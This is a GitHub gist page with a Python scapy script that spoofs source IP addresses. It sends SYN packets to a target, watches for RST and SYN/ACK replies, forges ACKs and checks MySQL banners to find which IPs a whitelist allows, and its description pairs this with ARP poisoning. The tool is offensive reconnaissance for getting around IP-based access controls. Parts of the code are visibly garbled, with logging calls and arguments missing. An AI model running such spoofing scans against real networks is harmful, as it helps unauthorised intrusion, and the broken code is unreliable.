Skip to content

Instantly share code, notes, and snippets.

Created February 18, 2018 15:26
What would you like to do?
Identify whitelisted IP addresses using spoofing techniques in conjunction with arp poisoning
#!/usr/bin/env python
#DiabloHorn -
#Find whitelisted IP addresses on a network & application level
import sys
import logging
import threading
import argparse
from scapy.all import *
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
class checkreply(threading.Thread):
def __init__(self, iface, srcports, spoofedips):
self.iface = iface
self.srcports = srcports
self.sips = []
self.started = True
with open(spoofedips, 'r') as fsrcips:
for line in fsrcips:
def __buildportfilter(self, ports):
filterstr = 'port {0}'.format(ports[0])
for i in ports[1:]:
filterstr += ' or port {0}'.format(i)
return filterstr
def run(self):
logging.debug('Sniffer thread called')
filterstr = self.__buildportfilter(self.srcports)
sniff(iface=self.iface,store=0,prn=self.checkport,stop_filter=self.stopflag,filter="tcp and {0}".format(filterstr))
def stopflag(self, pktdata):
logging.debug('Sniffer thread check stop flag')
if self.started:
return False
return True
def stopsniffer(self):
self.started = False
def checkport(self,pktdata):
logging.debug('Sniffer packet inspection triggered')
if pktdata.haslayer(IP) and pktdata.haslayer(TCP):
ipdata = pktdata.getlayer(IP)
tcpdata = pktdata.getlayer(TCP)
if ipdata.src in self.sips and ((tcpdata.flags >> 2) & 1):
#we got a rst from spoofed IP, thus we found possible ip'{0} possibly allowed in whitelist RST'.format(ipdata.src))
if ipdata.dst in self.sips and ((tcpdata.flags >> 1) & 1) and ((tcpdata.flags >> 4) & 1):
#we got syn/ack, found possible ip'{0} possibly allowed in whitelist SYN/ACK'.format(ipdata.dst))
ackpkt = IP(src=ipdata.dst,dst=ipdata.src) / TCP(,sport=tcpdata.dport,seq=tcpdata.ack,ack=(tcpdata.seq+1),flags='A')
if ipdata.dst in self.sips and ((tcpdata.flags >> 4) & 1) and ((tcpdata.flags >> 3) & 1):
if == 3306:
def check_mysql(self, ip, data):
banner = 'is not allowed to connect'
if banner not in str(data):'{0} confirmed allowed in whitelist'.format(ip))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='scan target with spoofed IP to identify whitelist')
parser.add_argument('targetip',type=str,help='target ip to perform port scan on')
parser.add_argument('-i', '--iface',type=str,required=True,help='network interface to use')
parser.add_argument('-p', '--ports',nargs='+',type=int,required=True,help='space separated list of ports')
parser.add_argument('-s', '--srcips',type=str,required=True,help='file with IPs to spoof')
myargs = parser.parse_args()
replychecker = checkreply(myargs.iface,myargs.ports,myargs.srcips)
for port in myargs.ports:
with open(myargs.srcips, 'r') as fsrcips:
for line in fsrcips:
pkt = IP(dst='{0}'.format(myargs.targetip),src='{0}'.format(line.strip())) / TCP(dport=port,flags='S')
except KeyboardInterrupt:'ctrl-c stopping sniffer')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment